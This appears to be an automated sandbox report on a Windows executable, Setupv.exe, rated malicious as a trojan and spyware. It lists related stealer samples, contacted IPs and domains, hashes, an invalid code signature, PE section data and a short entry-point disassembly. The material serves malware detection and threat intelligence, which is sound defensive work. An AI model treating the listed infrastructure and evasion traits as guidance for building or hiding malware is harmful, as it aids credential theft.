                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                              Technologies:
                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                              Sample name:Setupv.exe
                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@11/3
                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                              • Successful, ratio: 83%
                                                                                                                                                                                              • Number of executed functions: 37
                                                                                                                                                                                              • Number of non-executed functions: 72
                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                              • Stop behavior analysis, all processes terminated
                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                              Simulations

                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                              13:34:51API Interceptor7x Sleep call for process: Setupv.exe modified

                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                              IPs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              104.21.36.133wextract-gen.EXE.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                FrRLbLZMuB.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                  8tXTOlPbMn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    8cyhcAt5qW.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                      23.52.218.12FrRLbLZMuB.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                        Pl6q6O7NqM.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                          8tXTOlPbMn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            8cyhcAt5qW.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                              250428-heb9faxqw7.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                stage6.exeGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                  random.exeGet hashmaliciousAmadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                    random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        random.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          toptalentw.topwextract-gen.EXE.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          FrRLbLZMuB.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          Pl6q6O7NqM.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                          • 172.67.194.111
                                                                                                                                                                                                                          8tXTOlPbMn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          8cyhcAt5qW.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          steamcommunity.comwextract-gen.EXE.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                          • 23.222.161.105
                                                                                                                                                                                                                          FrRLbLZMuB.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          Pl6q6O7NqM.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          8tXTOlPbMn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          8cyhcAt5qW.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          250428-heb9faxqw7.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.222.161.105
                                                                                                                                                                                                                          250428-heb9faxqw7.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          250427-3trynatzcx.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.51.204.111
                                                                                                                                                                                                                          random.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC Stealer, RedLine, XmrigBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          random.exeGet hashmaliciousAmadey, CryptOne, LummaC StealerBrowse
                                                                                                                                                                                                                          • 23.222.161.105
                                                                                                                                                                                                                          pki-goog.l.google.comkeylogger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 142.250.72.131
                                                                                                                                                                                                                          dr.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 192.178.49.195
                                                                                                                                                                                                                          text.bat.exeGet hashmaliciousMyDoomBrowse
                                                                                                                                                                                                                          • 192.178.49.195
                                                                                                                                                                                                                          PO9765.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 192.178.49.195
                                                                                                                                                                                                                          Tapflo Group.VBS.vbsGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • 192.178.49.195
                                                                                                                                                                                                                          PO-0427-26 - 150-30.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • 192.178.49.195
                                                                                                                                                                                                                          Shipping Documents SI 694_pdf.jsGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                                                                          • 192.178.49.195
                                                                                                                                                                                                                          0.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                          • 192.178.49.195
                                                                                                                                                                                                                          hyirn.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 192.178.49.195
                                                                                                                                                                                                                          iiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                          • 192.178.49.195

                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          TelecentroSAARFW_ Final Reminder Before Maintenance Day From Proofpoint, Inc.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.52.214.123
                                                                                                                                                                                                                          FrRLbLZMuB.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          Pl6q6O7NqM.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          8tXTOlPbMn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          8cyhcAt5qW.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          250428-heb9faxqw7.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          stage6.exeGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          https://voiceoversecure.divineblizzsystems.com&d=DwMGaQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.52.210.234
                                                                                                                                                                                                                          random.exeGet hashmaliciousAmadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          CLOUDFLARENETUShttp://sharesmorefileson.comGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                                                                          • 172.67.151.194
                                                                                                                                                                                                                          http://okvipbank.meGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.43.112
                                                                                                                                                                                                                          Adblock360-Setup_2.1.0.0053.msiGet hashmaliciousCoinhive, XmrigBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          wextract-gen.EXE.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          rawb_invoice_bl.vbsGet hashmaliciousRemcos, AsyncRATBrowse
                                                                                                                                                                                                                          • 104.21.80.1
                                                                                                                                                                                                                          http://sprayfoamsys.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.35.145
                                                                                                                                                                                                                          https://vault.nimbox.co.uk/shares/file/78LUoWVICRC/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.36.106
                                                                                                                                                                                                                          https://keap.app/contact-us/2539027575244025Get hashmaliciousInvisible JS, Tycoon2FABrowse
                                                                                                                                                                                                                          • 104.21.7.201
                                                                                                                                                                                                                          z82CVDanielaRominaMelgarejo.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          http://euwlqywwavef2ttqpckz.dcovykq.es/slEF6jCs2KZ/#sample@domain.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 1.1.1.1
                                                                                                                                                                                                                          CLOUDFLARENETUShttp://sharesmorefileson.comGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                                                                          • 172.67.151.194
                                                                                                                                                                                                                          http://okvipbank.meGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.43.112
                                                                                                                                                                                                                          Adblock360-Setup_2.1.0.0053.msiGet hashmaliciousCoinhive, XmrigBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          wextract-gen.EXE.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          rawb_invoice_bl.vbsGet hashmaliciousRemcos, AsyncRATBrowse
                                                                                                                                                                                                                          • 104.21.80.1
                                                                                                                                                                                                                          http://sprayfoamsys.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.35.145
                                                                                                                                                                                                                          https://vault.nimbox.co.uk/shares/file/78LUoWVICRC/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.36.106
                                                                                                                                                                                                                          https://keap.app/contact-us/2539027575244025Get hashmaliciousInvisible JS, Tycoon2FABrowse
                                                                                                                                                                                                                          • 104.21.7.201
                                                                                                                                                                                                                          z82CVDanielaRominaMelgarejo.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          http://euwlqywwavef2ttqpckz.dcovykq.es/slEF6jCs2KZ/#sample@domain.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 1.1.1.1

                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1wextract-gen.EXE.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          • 172.67.182.68
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          dr.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          • 172.67.182.68
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          #U041f#U0430#U0440#U043e#U043b#U044c.jsGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          • 172.67.182.68
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          Scanned-Doc-t00778886867-QUO.LNK.lnkGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          • 172.67.182.68
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          Tapflo Group.VBS.vbsGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          • 172.67.182.68
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          Shipping Documents SI 694_pdf.jsGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          • 172.67.182.68
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          Order Request No. E0147-1-T1911.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          • 172.67.182.68
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          AWB 210229572045.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          • 172.67.182.68
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          iiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          • 172.67.182.68
                                                                                                                                                                                                                          • 23.52.218.12
                                                                                                                                                                                                                          FrRLbLZMuB.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.36.133
                                                                                                                                                                                                                          • 172.67.182.68
                                                                                                                                                                                                                          • 23.52.218.12

                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                          No created / dropped files found

                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                          Entropy (8bit):7.085555487437187
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                          • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                          File name:Setupv.exe
                                                                                                                                                                                                                          File size:5'298'048 bytes
                                                                                                                                                                                                                          MD5:a88651093c94d9006da8ccbc80535e29
                                                                                                                                                                                                                          SHA1:31208c84dd3066d4d0449c588e1614485156845e
                                                                                                                                                                                                                          SHA256:fc9adba0c5b7ac7700a7e904aecfffb41a53c9311f249dcbf5678707d10db7ea
                                                                                                                                                                                                                          SHA512:429ac4fafa5b4cab9b878fd4a5b948396190249cd7ee12e47c43fa92db493f40a2f6f9c7f63402f96c8157b0c9a8460bd327c485a28c3cf169c851f148725c0e
                                                                                                                                                                                                                          SSDEEP:49152:J6P0t/mKL0CzTjrqDXgCTsezKafdlLdIcvakldp18+MCttplBzm8dvHO8KiRmXx2:cPkOvBvR6RzvQh8FT56FoliU5tRx4V
                                                                                                                                                                                                                          TLSH:9E36AF617246943BD1AB2B3A153FBA60953DBB586912C947A3F00C4C9F765813B2F38F
                                                                                                                                                                                                                          File Content Preview:MZP.....................@......Pjr......................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                          Icon Hash:124dccccccccc686

                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Entrypoint:0x4021cc
                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                                                                          Time Stamp:0x654CAD79 [Thu Nov 9 09:59:21 2023 UTC]
                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                          Import Hash:68eed7d94eea7cf7296e2d2b6f51737b

                                                                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                          Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                          • 10/01/2022 01:00:00 10/01/2025 00:59:59
                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                          • CN=DOS SANTOS DA SILVA ALFREDO, O=DOS SANTOS DA SILVA ALFREDO, S=Occitanie, C=FR, OID.2.5.4.15=Business Entity, OID.1.3.6.1.4.1.311.60.2.1.3=FR, SERIALNUMBER=789 849 163 00025
                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                          Thumbprint MD5:969883F5E1C9A0AFDC8ECA5778CD455E
                                                                                                                                                                                                                          Thumbprint SHA-1:0FFC830BD50362A6993425B973EFEA97BC8AEB0E
                                                                                                                                                                                                                          Thumbprint SHA-256:BB48064FA3A2272DD3B18C9D330293C867964D2880520CFA45ABEA00BE80BB9F
                                                                                                                                                                                                                          Serial:009EB86320BC00ABF185BBDE0332C26F58
                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          jmp 00007FEB68DEFE62h
                                                                                                                                                                                                                          bound di, dword ptr [edx]
                                                                                                                                                                                                                          inc ebx
                                                                                                                                                                                                                          sub ebp, dword ptr [ebx]
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          dec edi
                                                                                                                                                                                                                          dec edi
                                                                                                                                                                                                                          dec ebx
                                                                                                                                                                                                                          nop
                                                                                                                                                                                                                          jmp 00007FEB6952FF01h
                                                                                                                                                                                                                          mov eax, dword ptr [0074009Fh]
                                                                                                                                                                                                                          shl eax, 02h
                                                                                                                                                                                                                          mov dword ptr [007400A3h], eax
                                                                                                                                                                                                                          push edx
                                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                                          call 00007FEB6912C376h
                                                                                                                                                                                                                          mov edx, eax
                                                                                                                                                                                                                          call 00007FEB6911C69Bh
                                                                                                                                                                                                                          pop edx
                                                                                                                                                                                                                          call 00007FEB6911C5BDh
                                                                                                                                                                                                                          call 00007FEB6911C7ECh
                                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                                          call 00007FEB6911E535h
                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                          push 00740048h
                                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                                          call 00007FEB6912C350h
                                                                                                                                                                                                                          mov dword ptr [007400A7h], eax
                                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                                          jmp 00007FEB69127B68h
                                                                                                                                                                                                                          jmp 00007FEB6911E567h
                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                          mov al, byte ptr [00740091h]
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          mov eax, dword ptr [007400A7h]
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          pushad
                                                                                                                                                                                                                          mov ebx, BCB05000h
                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                          push 00000BADh
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          mov ecx, 000000F0h
                                                                                                                                                                                                                          or ecx, ecx
                                                                                                                                                                                                                          je 00007FEB68DEFE9Fh
                                                                                                                                                                                                                          cmp dword ptr [0074009Fh], 00000000h
                                                                                                                                                                                                                          jnc 00007FEB68DEFE5Ch
                                                                                                                                                                                                                          mov eax, 000000FEh
                                                                                                                                                                                                                          call 00007FEB68DEFE2Ch
                                                                                                                                                                                                                          mov ecx, 000000F0h
                                                                                                                                                                                                                          push ecx
                                                                                                                                                                                                                          push 00000008h
                                                                                                                                                                                                                          call 00007FEB6912C313h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007FEB6912C3B5h
                                                                                                                                                                                                                          or eax, eax
                                                                                                                                                                                                                          jne 00007FEB68DEFE5Ch
                                                                                                                                                                                                                          mov eax, 000000FDh
                                                                                                                                                                                                                          call 00007FEB68DEFE0Bh
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          push dword ptr [0074009Fh]
                                                                                                                                                                                                                          call 00007FEB69127D56h
                                                                                                                                                                                                                          push dword ptr [0074009Fh]
                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3a40000x2a5fd.edata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x39f0000x3acc.idata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3cf0000x9800.rsrc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x507c000x5b80.reloc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x3d90000x423a4.reloc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x39e0000x18.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3a30000x9ab.didata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                          .text0x10000x33f0000x33e800035a02a40aabe062dcfac75ab400611dunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .data0x3400000x5d0000x3f600167dfa8df33fb4d2cc3eaa4765ff98cfFalse0.21953202046351084data5.606925262276647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          .tls0x39d0000x10000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          .rdata0x39e0000x10000x200dc9ff986446ed24f1ae9394daf493165False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .idata0x39f0000x40000x3c0054b566ddda943da7c533ee680e5584adFalse0.31100260416666664data5.243391675198522IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .didata0x3a30000x10000xa00a945ff51966ce32471a3f240b0071d2bFalse0.3953125data4.563216715868903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          .edata0x3a40000x2b0000x2a600d0f6f292a14c0ececce03f369bf2e24aFalse0.21546598451327434data5.838964108165409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .rsrc0x3cf0000xa0000x9800b15d895e6b64f0f78f4e0b39ccfa33b0False0.27017372532894735data4.4698416088770445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .reloc0x3d90000x151ba60x1510004f3a6cfc51209cd76fb39fc6a141c5d3False0.9298758577522255data7.9246221544666025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                          RT_CURSOR0x3cfa240x134dataEnglishUnited States0.43506493506493504
                                                                                                                                                                                                                          RT_CURSOR0x3cfb580x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                                                          RT_CURSOR0x3cfc8c0x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                                                          RT_CURSOR0x3cfdc00x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                                                          RT_CURSOR0x3cfef40x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                                                          RT_CURSOR0x3d00280x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                                          RT_CURSOR0x3d015c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                          RT_CURSOR0x3d02900x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                          RT_ICON0x3d03c40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600, resolution 283464 x 283464 px/mEnglishUnited States0.2564315352697095
                                                                                                                                                                                                                          RT_STRING0x3d296c0x104data0.38461538461538464
                                                                                                                                                                                                                          RT_STRING0x3d2a700x440data0.40441176470588236
                                                                                                                                                                                                                          RT_STRING0x3d2eb00x40cdata0.34459459459459457
                                                                                                                                                                                                                          RT_STRING0x3d32bc0x414data0.3007662835249042
                                                                                                                                                                                                                          RT_STRING0x3d36d00x374data0.4343891402714932
                                                                                                                                                                                                                          RT_STRING0x3d3a440x474data0.3929824561403509
                                                                                                                                                                                                                          RT_STRING0x3d3eb80xc0data0.6041666666666666
                                                                                                                                                                                                                          RT_STRING0x3d3f780x100data0.57421875
                                                                                                                                                                                                                          RT_STRING0x3d40780x320data0.40125
                                                                                                                                                                                                                          RT_STRING0x3d43980x430data0.375
                                                                                                                                                                                                                          RT_STRING0x3d47c80x41cdata0.37832699619771865
                                                                                                                                                                                                                          RT_STRING0x3d4be40x3bcdata0.35460251046025104
                                                                                                                                                                                                                          RT_STRING0x3d4fa00x19cdata0.4344660194174757
                                                                                                                                                                                                                          RT_STRING0x3d513c0xecdata0.5508474576271186
                                                                                                                                                                                                                          RT_STRING0x3d52280x1f0data0.5100806451612904
                                                                                                                                                                                                                          RT_STRING0x3d54180x3fcdata0.36666666666666664
                                                                                                                                                                                                                          RT_STRING0x3d58140x424data0.34150943396226413
                                                                                                                                                                                                                          RT_STRING0x3d5c380x2fcdata0.36649214659685864
                                                                                                                                                                                                                          RT_STRING0x3d5f340x3c4data0.36410788381742737
                                                                                                                                                                                                                          RT_STRING0x3d62f80x360data0.3194444444444444
                                                                                                                                                                                                                          RT_STRING0x3d66580x464data0.40658362989323843
                                                                                                                                                                                                                          RT_STRING0x3d6abc0x70cdata0.33647450110864746
                                                                                                                                                                                                                          RT_STRING0x3d71c80x49cdata0.3288135593220339
                                                                                                                                                                                                                          RT_STRING0x3d76640x36cdata0.410958904109589
                                                                                                                                                                                                                          RT_STRING0x3d79d00x348data0.3392857142857143
                                                                                                                                                                                                                          RT_STRING0x3d7d180x478data0.3924825174825175
